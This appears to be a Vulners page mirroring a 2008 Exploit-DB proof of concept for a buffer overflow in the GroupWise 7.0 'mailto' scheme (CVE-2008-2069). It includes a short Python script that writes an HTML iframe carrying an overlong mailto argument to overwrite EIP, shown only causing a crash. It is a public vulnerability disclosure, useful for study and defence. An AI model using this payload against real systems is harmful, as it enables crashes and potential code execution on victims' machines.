Lucene search
+L

Groupwise 7.0 - 'mailto: scheme' Buffer Overflow (PoC)

🗓️ 28 Apr 2008 00:00:00Reported by Juan YacubianType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 35 Views

Mailto scheme buffer overflow in GroupWise 7.0 for Windows X

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2008-2069
28 Apr 200800:00
circl
cve
CVE
CVE-2008-2069
2 May 200823:00
cve
cvelist
Cvelist
CVE-2008-2069
2 May 200823:00
cvelist
d2
d2
DSquare Exploit Pack: D2SEC_GW7
2 May 200823:20
d2
nvd
NVD
CVE-2008-2069
2 May 200823:20
nvd
prion
Prion
Buffer overflow
2 May 200823:20
prion
PRODUCT: GroupWise 7.0
OS: Windows Xp

The scheme "mailto" is vulnerable if one takes as default mail client to
GroupWise, the fault is to implement the scheme followed by an extensive
argument and this causes the buffer overflow. This brings the consequence that
can overwrite the EIP and is able to execute arbitrary code. The result with a
debbuger us what reveals.

Access violation when executing [41414141]

What power is that vulnerability to attach a html file which is included in an
iframe with the scheme badly formed runs only watch.

proof of concept

#!/usr/bin/python

a = "<iframe src='mailto:"
a += "A" * 1530
a += "\x61\x61\x61\x61"
a += "' width='320' height='300' scrolling='yes' name='content'></iframe>"

file = open("test.html", "w")
file.write(a)
file.close()

greetings!

Juan Pablo Lopez Yacubian

# milw0rm.com [2008-04-28]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

24 Nov 2016 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 29.3
EPSS0.33446
35